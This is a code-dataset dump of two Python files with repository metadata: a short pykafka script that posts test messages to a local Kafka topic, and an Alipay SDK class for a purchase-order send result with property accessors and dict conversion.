21555868489 | from pykafka import KafkaClient
import time
client = KafkaClient("127.0.0.1:9093")
geostream = client.topics["geostream"]
with geostream.get_sync_producer() as producer:
i = 0
for _ in range(10):
producer.produce(("Kafka is not just an author " + str(i)).encode('ascii'))
i += 1
time.sleep(1)
print ("Posted {}".format(i))
| singhujjwal/fastapi-test | kafka/test_kafka/MV_producer.py | MV_producer.py | py | 367 | python | en | code | 2 | github-code | 13 |
17035436664 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AccessPurchaseOrderSendResult(object):
def __init__(self):
self._asset_item_id = None
self._asset_order_id = None
self._asset_purchase_id = None
self._error_code = None
self._error_desc = None
self._out_biz_no = None
self._success = None
@property
def asset_item_id(self):
return self._asset_item_id
@asset_item_id.setter
def asset_item_id(self, value):
self._asset_item_id = value
@property
def asset_order_id(self):
return self._asset_order_id
@asset_order_id.setter
def asset_order_id(self, value):
self._asset_order_id = value
@property
def asset_purchase_id(self):
return self._asset_purchase_id
@asset_purchase_id.setter
def asset_purchase_id(self, value):
self._asset_purchase_id = value
@property
def error_code(self):
return self._error_code
@error_code.setter
def error_code(self, value):
self._error_code = value
@property
def error_desc(self):
return self._error_desc
@error_desc.setter
def error_desc(self, value):
self._error_desc = value
@property
def out_biz_no(self):
return self._out_biz_no
@out_biz_no.setter
def out_biz_no(self, value):
self._out_biz_no = value
@property
def success(self):
return self._success
@success.setter
def success(self, value):
self._success = value
def to_alipay_dict(self):
params = dict()
if self.asset_item_id:
if hasattr(self.asset_item_id, 'to_alipay_dict'):
params['asset_item_id'] = self.asset_item_id.to_alipay_dict()
else:
params['asset_item_id'] = self.asset_item_id
if self.asset_order_id:
if hasattr(self.asset_order_id, 'to_alipay_dict'):
params['asset_order_id'] = self.asset_order_id.to_alipay_dict()
else:
params['asset_order_id'] = self.asset_order_id
if self.asset_purchase_id:
if hasattr(self.asset_purchase_id, 'to_alipay_dict'):
params['asset_purchase_id'] = self.asset_purchase_id.to_alipay_dict()
else:
params['asset_purchase_id'] = self.asset_purchase_id
if self.error_code:
if hasattr(self.error_code, 'to_alipay_dict'):
params['error_code'] = self.error_code.to_alipay_dict()
else:
params['error_code'] = self.error_code
if self.error_desc:
if hasattr(self.error_desc, 'to_alipay_dict'):
params['error_desc'] = self.error_desc.to_alipay_dict()
else:
params['error_desc'] = self.error_desc
if self.out_biz_no:
if hasattr(self.out_biz_no, 'to_alipay_dict'):
params['out_biz_no'] = self.out_biz_no.to_alipay_dict()
else:
params['out_biz_no'] = self.out_biz_no
if self.success:
if hasattr(self.success, 'to_alipay_dict'):
params['success'] = self.success.to_alipay_dict()
else:
params['success'] = self.success
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AccessPurchaseOrderSendResult()
if 'asset_item_id' in d:
o.asset_item_id = d['asset_item_id']
if 'asset_order_id' in d:
o.asset_order_id = d['asset_order_id']
if 'asset_purchase_id' in d:
o.asset_purchase_id = d['asset_purchase_id']
if 'error_code' in d:
o.error_code = d['error_code']
if 'error_desc' in d:
o.error_desc = d['error_desc']
if 'out_biz_no' in d:
o.out_biz_no = d['out_biz_no']
if 'success' in d:
o.success = d['success']
return o
| alipay/alipay-sdk-python-all | alipay/aop/api/domain/AccessPurchaseOrderSendResult.py | AccessPurchaseOrderSendResult.py | py | 4,074 | python | en | code | 241 | github-code | 13 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.